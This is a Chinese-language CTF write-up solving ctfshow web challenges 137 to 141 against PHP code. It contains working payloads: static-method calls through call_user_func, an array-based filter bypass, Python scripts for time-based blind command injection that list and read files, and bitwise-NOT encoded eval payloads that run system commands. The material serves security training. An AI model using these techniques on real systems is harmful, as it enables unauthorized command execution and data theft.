目录
1、web137
2、web138
3、web139
4、web140
5、web141
1、web137
直接调用 ctfshow 这个类下的 getFlag 函数,payload:
ctfshow=ctfshow::getFlag
查看源码:
拿到 flag:ctfshow{dd387d95-6fbe-4703-8ec5-9c8f9baf2bb5}
在 php 中,-> 用于访问类的实例成员(属性和方法),我们需要先实例化类,然后通过实例对象来调用其成员;而 :: 用于访问类的静态成员(静态属性和静态方法)和常量,静态成员属于类本身,而不是任何具体实例,因此不需要实例化类即可调用它们。
2、web138
新增
if(strripos($_POST['ctfshow'], ":")>-1){die("private function");
}
strripos() 函数用于查找字符串在另一字符串中最后一次出现的位置(不区分大小写),这里相当于就是对提交内容过滤掉了冒号。
对于 call_user_func 我们还可以通过数组来传递,payload:
ctfshow[0]=ctfshow&ctfshow[1]=getFlag
ctfshow[0]=ctfshow:数组的第一个元素是字符串 "ctfshow",表示类名。
ctfshow[1]=getFlag:数组的第二个元素是字符串 "getFlag",表示类的静态方法名。
$ctfshow = [0 => 'ctfshow',1 => 'getFlag'
];
调用 strripos 时,如果第一个参数是数组,PHP 将会返回 null,因为 strripos 期望第一个参数是字符串类型,所以不会触发 die("private function");。
call_user_func($_POST['ctfshow']); 将解析为 call_user_func(['ctfshow', 'getFlag']);,这将静态调用 ctfshow::getFlag() 方法。
查看源码:
拿到 flag:ctfshow{a9f9b85e-2b43-4620-8e62-e767f99860fd}
3、web139
看似和 web136 一样,但是测了下 payload 不行,没有了写文件的权限。
脚本原理:
通过时间盲注攻击获取文件名,逐行、逐列地测试字符,并根据请求是否超时来确定正确的字符,每找到一个字符就添加到 result 中,最终打印出完整的结果。
先列出根目录:
注意这里最好走 http 协议,https 我输出有问题。
import requests
import time
import stringstr = string.ascii_letters + string.digits + '_~'
result = ""for i in range(1, 10): # 行key = 0for j in range(1, 15): # 列if key == 1:breakfor n in str:# awk 'NR=={0}'逐行输出获取# cut -c {1} 截取单个字符payload = "if [ `ls /|awk 'NR=={0}'|cut -c {1}` == {2} ];then sleep 3;fi".format(i, j, n)# print(payload)url = "http://2150bfa9-5de9-47bf-833a-dac6a405f625.challenge.ctf.show/?c=" + payloadtry:requests.get(url, timeout=(2.5, 2.5))except:result = result + nprint(result)breakif n == '~':key = 1result += " "print("Final result:", result)
发现存在名为 f149_15_h3r3 的文件,读取:
import requests
import time
import string
str=string.digits+string.ascii_lowercase+"-"
result=""
key=0
for j in range(1,45):print(j)if key==1:breakfor n in str:payload="if [ `cat /f149_15_h3r3|cut -c {0}` == {1} ];then sleep 3;fi".format(j,n)#print(payload)url="http://2150bfa9-5de9-47bf-833a-dac6a405f625.challenge.ctf.show/?c="+payloadtry:requests.get(url,timeout=(2.5,2.5))except:result=result+nprint(result)break
加上大括号包裹,最终 flag:ctfshow{5a0ffe9d-5ade-4236-b824-45f929ff25fe}
4、web140
正则表达式要求 f1 和 f2 只能是数字和小写字母,$f2() 被视为一个函数调用,$f1 作为函数名调用 $f2() 的返回值,最后进行弱比较,由于 'ctfshow' 转换为整数是 0,因此条件实际上是检查 intval($code) 是否为 0。
那么 $code 就有很多的情况:
(1)字母开头的字符串
字符串形式的字母或数字(如 "a", "b123", 等),在 PHP 中,任何以字母开头的字符串在转换为整数时通常会被视为 0。
(2)空字符串 "" 和 "0":在转换为整数时也是 0。
(3)空数组:空数组 array() 在转换为整数时会被视为 0。
(4)整数 0:直接返回整数 0。
(5)布尔值 false:布尔值 false 在转换为整数时会被视为 0。
payload:
f1=system&f2=system # 布尔值 false
f1=md5&f2=phpinfo # 字母开头的字符串
f1=usleep&f2=usleep # usleep() 没有返回值,调用 usleep() 将导致 eval() 返回 null。当 null 传递给 intval() 时,返回值是 0。
查看源码:
拿到 flag:ctfshow{60e8e916-088f-4618-b9b5-74fd4ec828d4}
5、web141
要求 v1 和 v2 是数字,检查 v3 是否只包含非单词字符(非字母、非数字、非下划线),且长度大于零,将 $v1 和 $v2 作为操作数,$v3 作为操作符,构建一个表达式,并使用 eval() 执行它,最后输出表达式及其结果。
在 php 里数字和一些命令进行运算后也是可以让命令执行的,比如 1-phpinfo(); 是可以执行 phpinfo() 命令的,那么我们这里可能构造出命令的地方就是在 v3 了,再在 v3 前后加上运算符即可,这里采用取反的方法:
<?php
echo urlencode(~'system');
echo "\n".urlencode(~'ls');
?>
构造 payload:
?v1=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%93%8C)-
读取 flag:
<?php
echo urlencode(~'system');
echo "\n".urlencode(~'tac flag.php');
?>
构造 payload:
?v1=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%8B%9E%9C%DF%99%93%9E%98%D1%8F%97%8F)-
拿到 flag:ctfshow{d7125c70-b6c9-4504-afb4-e7f187f5d497}